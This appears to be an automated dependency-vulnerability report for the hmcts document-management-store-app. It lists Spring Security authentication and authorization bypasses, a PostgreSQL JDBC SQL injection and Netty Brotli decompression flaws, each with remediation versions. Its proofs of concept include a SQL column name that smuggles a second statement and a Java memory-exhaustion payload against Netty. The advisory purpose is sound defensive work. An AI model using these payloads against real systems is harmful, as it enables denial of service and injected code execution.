References

high severity

Authentication Bypass

  • Vulnerable module: org.springframework.security:spring-security-web
  • Introduced through: org.springframework.security:spring-security-web@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-web@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-web@3.0.0.RELEASE.

Overview

org.springframework.security:spring-security-web is a package within Spring Security that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Authentication Bypass. The strictness of the Spring Security and the Spring Framework request mapping may differ, which could lead to resources not being secured.

Remediation

Upgrade org.springframework.security:spring-security-web to version 4.1.1.RELEASE or higher.

References

high severity

Security Bypass

  • Vulnerable module: org.springframework.security:spring-security-web
  • Introduced through: org.springframework.security:spring-security-web@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-web@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-web@3.0.0.RELEASE.

Overview

org.springframework.security:spring-security-web is a package within Spring Security that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Security Bypass. It was found that Spring Security does not consider URL path parameters when processing security constraints. By adding a URL path parameter with an encoded / to a request an attacker may be able to bypass a security constraint.

Remediation

Upgrade org.springframework.security:spring-security-web to version 3.2.10.RELEASE, 4.1.4.RELEASE, 4.2.1.RELEASE or higher.

References

high severity

Authentication Bypass

  • Vulnerable module: org.springframework.security:spring-security-core
  • Introduced through: org.springframework.security:spring-security-core@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-core@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-core@2.0.0.

Overview

org.springframework.security:spring-security-core is a package that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Authentication Bypass when directly using the AuthenticationTrustResolver.isFullyAuthenticated(Authentication) method and passing a null authentication parameter to it.

Note:

An application is not vulnerable if any of the following is true:

  1. the application does not use AuthenticationTrustResolver.isFullyAuthenticated(Authentication) directly

  2. the application does not pass null to AuthenticationTrustResolver.isFullyAuthenticated

  3. the application only uses isFullyAuthenticated via Method Security or HTTP Request Security

Remediation

Upgrade org.springframework.security:spring-security-core to version 6.1.7, 6.2.2 or higher.

References

high severity

Authentication Bypass

  • Vulnerable module: org.springframework.security:spring-security-oauth2-client
  • Introduced through: org.springframework.security:spring-security-oauth2-client@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-oauth2-client@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-oauth2-client@5.0.0.RELEASE.

Overview

Affected versions of this package are vulnerable to Authentication Bypass when directly using the AuthenticationTrustResolver.isFullyAuthenticated(Authentication) method and passing a null authentication parameter to it.

Note:

An application is not vulnerable if any of the following is true:

  1. the application does not use AuthenticationTrustResolver.isFullyAuthenticated(Authentication) directly

  2. the application does not pass null to AuthenticationTrustResolver.isFullyAuthenticated

  3. the application only uses isFullyAuthenticated via Method Security or HTTP Request Security

Remediation

Upgrade org.springframework.security:spring-security-oauth2-client to version 6.1.7, 6.2.2 or higher.

References

high severity

Authentication Bypass

  • Vulnerable module: org.springframework.security:spring-security-web
  • Introduced through: org.springframework.security:spring-security-web@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-web@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-web@3.0.0.RELEASE.

Overview

org.springframework.security:spring-security-web is a package within Spring Security that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Authentication Bypass when directly using the AuthenticationTrustResolver.isFullyAuthenticated(Authentication) method and passing a null authentication parameter to it.

Note:

An application is not vulnerable if any of the following is true:

  1. the application does not use AuthenticationTrustResolver.isFullyAuthenticated(Authentication) directly

  2. the application does not pass null to AuthenticationTrustResolver.isFullyAuthenticated

  3. the application only uses isFullyAuthenticated via Method Security or HTTP Request Security

Remediation

Upgrade org.springframework.security:spring-security-web to version 6.1.7, 6.2.2 or higher.

References

high severity

Authorization Bypass

  • Vulnerable module: org.springframework.security:spring-security-web
  • Introduced through: org.springframework.security:spring-security-web@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-web@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-web@3.0.0.RELEASE.

Overview

org.springframework.security:spring-security-web is a package within Spring Security that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Authorization Bypass via forward or include dispatcher types.

An application is vulnerable when all of the following are true:

  1. The application expects that Spring Security applies security to forward and include dispatcher types.

  2. The application uses the AuthorizationFilter either manually or via the authorizeHttpRequests() method.

  3. The application configures the FilterChainProxy to apply to forward and/or include requests (e.g. spring.security.filter.dispatcher-types = request, error, async, forward, include).

  4. The application may forward or include the request to a higher privilege-secured endpoint.

  5. The application configures Spring Security to apply to every dispatcher type via authorizeHttpRequests().shouldFilterAllDispatcherTypes(true)

An application is not vulnerable if any of the following is true:

  1. The application does not use authorizeHttpRequests() or the AuthorizationFilter.

  2. The application does not forward/include requests.

  3. The application does not need to configure Spring Security to apply to FORWARD and INCLUDE dispatcher types.

Workaround

Users who are unable to upgrade should use AuthorizeRequests().filterSecurityInterceptorOncePerRequest(false) instead of AuthorizeHttpRequests().shouldFilterAllDispatcherTypes(true).

Users with version < 5.7.0 which does not have shouldFilterAllDispatcherTypes available, should add an ObjectPostProcessor:

authorizeHttpRequests().withObjectPostProcessor(new 
 ObjectPostProcessor<AuthorizationFilter>() {
   @Override 
   public<O extends AuthorizationFilter> O postProcess(O filter) { 
    filter.setObserveOncePerRequest(false); 
    filter.setFilterAsyncDispatch(true); 
    filter.setFilterErrorDispatch(true); 
    return filter;
   }});

Note:

In Spring Security 5, the default behavior is to not apply the filters more than once to a request, therefore users have to explicitly configure Spring Security to do that. In addition, the FilterChainProxy is also not configured to be invoked on forward and include dispatcher types.

Remediation

Upgrade org.springframework.security:spring-security-web to version 5.6.9, 5.7.5 or higher.

References

high severity

Authentication Bypass

  • Vulnerable module: org.springframework.security:spring-security-core
  • Introduced through: org.springframework.security:spring-security-core@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-core@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-core@2.0.0.

Overview

org.springframework.security:spring-security-core package that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Authentication Bypass. The ActiveDirectoryLdapAuthenticator does not check the password length. If the directory allows anonymous binds then it may incorrectly authenticate a user who supplies an empty password.

Remediation

Upgrade org.springframework.security:spring-security-core to version 3.2.2.RELEASE, 3.1.6.RELEASE or higher.

References

high severity

SQL Injection

  • Vulnerable module: org.postgresql:postgresql
  • Introduced through: org.postgresql:postgresql@versions.postgresql

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.postgresql:postgresql@versions.postgresql
    Remediation: Upgrade to org.postgresql:postgresql@42.2.26.

Overview

org.postgresql:postgresql is a Java JDBC 4.2 (JRE 8+) driver for PostgreSQL database.

Affected versions of this package are vulnerable to SQL Injection via the java.sql.ResultRow.refreshRow() function in jdbc/PgResultSet.java, due to insufficient escaping column names. An attacker with control of the underlying database can name a column with a string containing a semicolon or other statement terminator, then convince a user to run a query against the table with the compromised column, and then have the application run ResultSet.refreshRow(), to execute code.

NOTE:

  • An application that only connects to its own database with a fixed schema with no DDL permissions is not affected by this vulnerability.
  • Additionally, applications that do not invoke ResultSet.refreshRow() are not affected.

PoC:

CREATE TABLE refresh_row_example (
  id     int PRIMARY KEY,
  "1 FROM refresh_row_example; SELECT pg_sleep(10); SELECT * " int
);

Remediation

Upgrade org.postgresql:postgresql to version 42.2.26, 42.3.7, 42.4.1 or higher.

References

high severity

Multiple licenses: GPL-3.0, LGPL-3.0, MPL-1.1

  • Module: com.github.albfernandez:juniversalchardet
  • Introduced through: org.apache.tika:tika-parsers-standard-package@3.2.2

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-text-module@3.2.2 com.github.albfernandez:juniversalchardet@2.5.0
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-microsoft-module@3.2.2 org.apache.tika:tika-parser-text-module@3.2.2 com.github.albfernandez:juniversalchardet@2.5.0
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-code-module@3.2.2 org.apache.tika:tika-parser-text-module@3.2.2 com.github.albfernandez:juniversalchardet@2.5.0
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-mail-module@3.2.2 org.apache.tika:tika-parser-text-module@3.2.2 com.github.albfernandez:juniversalchardet@2.5.0
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-miscoffice-module@3.2.2 org.apache.tika:tika-parser-text-module@3.2.2 com.github.albfernandez:juniversalchardet@2.5.0
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-cad-module@3.2.2 org.apache.tika:tika-parser-microsoft-module@3.2.2 org.apache.tika:tika-parser-text-module@3.2.2 com.github.albfernandez:juniversalchardet@2.5.0

Multiple licenses: GPL-3.0, LGPL-3.0, MPL-1.1

medium severity
new

Improper Handling of Highly Compressed Data (Data Amplification)

  • Vulnerable module: io.netty:netty-codec-http
  • Introduced through: com.azure:azure-storage-blob@12.31.2

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-codec-http2@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-handler-proxy@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-storage-common@12.30.2 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.netty:netty-codec-http2@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-storage-common@12.30.2 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-codec-http2@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-storage-common@12.30.2 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-handler-proxy@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-storage-common@12.30.2 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-storage-internal-avro@12.16.2 com.azure:azure-storage-common@12.30.2 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-storage-common@12.30.2 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.netty:netty-codec-http2@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-storage-internal-avro@12.16.2 com.azure:azure-storage-common@12.30.2 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-codec-http2@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.projectreactor.netty:reactor-netty-core@1.2.8 io.netty:netty-handler-proxy@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-storage-internal-avro@12.16.2 com.azure:azure-storage-common@12.30.2 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-handler-proxy@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-storage-internal-avro@12.16.2 com.azure:azure-storage-common@12.30.2 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-storage-internal-avro@12.16.2 com.azure:azure-storage-common@12.30.2 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.netty:netty-codec-http2@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-storage-common@12.30.2 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.projectreactor.netty:reactor-netty-core@1.2.8 io.netty:netty-handler-proxy@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-storage-internal-avro@12.16.2 com.azure:azure-storage-common@12.30.2 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.projectreactor.netty:reactor-netty-core@1.2.8 io.netty:netty-handler-proxy@4.1.123.Final io.netty:netty-codec-http@4.1.123.Final

Overview

io.netty:netty-codec-http is a network application framework for rapid development of maintainable high performance protocol servers & clients.

Affected versions of this package are vulnerable to Improper Handling of Highly Compressed Data (Data Amplification) via the BrotliDecoder.decompress function, which has no limit on how often it calls pull, decompressing data 64K bytes at a time. An attacker can exhaust system memory and cause application downtime by submitting specially crafted compressed input that triggers excessive buffer allocations.

PoC

import io.netty.buffer.Unpooled;
import io.netty.channel.embedded.EmbeddedChannel;

import java.util.Base64;

public class T {
    public static void main(String[] args) {
        EmbeddedChannel channel = new EmbeddedChannel(new BrotliDecoder());
        channel.writeInbound(Unpooled.wrappedBuffer(Base64.getDecoder().decode("aPpxD1tETigSAGj6cQ8vRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROMBIAEgIaHwBETlQQVFcXlgA=")));
    }
}

Remediation

Upgrade io.netty:netty-codec-http to version 4.1.125.Final or higher.

References

medium severity
new

Improper Handling of Highly Compressed Data (Data Amplification)

  • Vulnerable module: io.netty:netty-codec-http2
  • Introduced through: com.azure:azure-storage-blob@12.31.2

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-codec-http2@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.netty:netty-codec-http2@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-storage-common@12.30.2 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-codec-http2@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-storage-common@12.30.2 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.netty:netty-codec-http2@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-storage-internal-avro@12.16.2 com.azure:azure-storage-common@12.30.2 com.azure:azure-core-http-netty@1.16.0 io.netty:netty-codec-http2@4.1.123.Final
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 com.azure:azure-storage-blob@12.31.2 com.azure:azure-storage-internal-avro@12.16.2 com.azure:azure-storage-common@12.30.2 com.azure:azure-core-http-netty@1.16.0 io.projectreactor.netty:reactor-netty-http@1.2.8 io.netty:netty-codec-http2@4.1.123.Final

Overview

io.netty:netty-codec-http2 is a HTTP2 sub package for the netty library, an event-driven asynchronous network application framework.

Affected versions of this package are vulnerable to Improper Handling of Highly Compressed Data (Data Amplification) via the BrotliDecoder.decompress function, which has no limit on how often it calls pull, decompressing data 64K bytes at a time. An attacker can exhaust system memory and cause application downtime by submitting specially crafted compressed input that triggers excessive buffer allocations.

PoC

import io.netty.buffer.Unpooled;
import io.netty.channel.embedded.EmbeddedChannel;

import java.util.Base64;

public class T {
    public static void main(String[] args) {
        EmbeddedChannel channel = new EmbeddedChannel(new BrotliDecoder());
        channel.writeInbound(Unpooled.wrappedBuffer(Base64.getDecoder().decode("aPpxD1tETigSAGj6cQ8vRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROMBIAEgIaHwBETlQQVFcXlgA=")));
    }
}

Remediation

Upgrade io.netty:netty-codec-http2 to version 4.1.125.Final or higher.

References

medium severity

Missing Authorization

  • Vulnerable module: org.springframework.security:spring-security-config
  • Introduced through: org.springframework.security:spring-security-config@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-config@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-config@3.0.0.RELEASE.

Overview

org.springframework.security:spring-security-config is a security configuration package for Spring Framework.

Affected versions of this package are vulnerable to Missing Authorization. When the applications using @AuthorizeReturnObject or the Spring Security produced AuthorizationAdvisorProxyFactory @Bean to wrap objects, they may not have all security advice applied, resulting in annotations like @PreFilter and @PreAuthorize may take no effect on these wrapped objects.

NOTE:

This does not impact any @Beans that use Spring Security's method security advice.

For this to impact an application, all of the following need to be true:

  1. AnnotationAwareAspectJAutoProxyCreator must be the auto proxy creator being used to create proxies; this can either be done declaratively by your application or enabled via @EnableAspectJAutoProxy or enabled by Spring Boot by virtue of using spring-aspects or a starter that uses spring-aspects

  2. The application must have at least one FactoryBean present in the application context.

  3. The application must enable method security with @EnableMethodSecurity

  4. The application must wrap objects using the @AuthorizeReturnObject annotation or the AuthorizationAdvisorProxyFactory @Bean` produced by Spring Security.

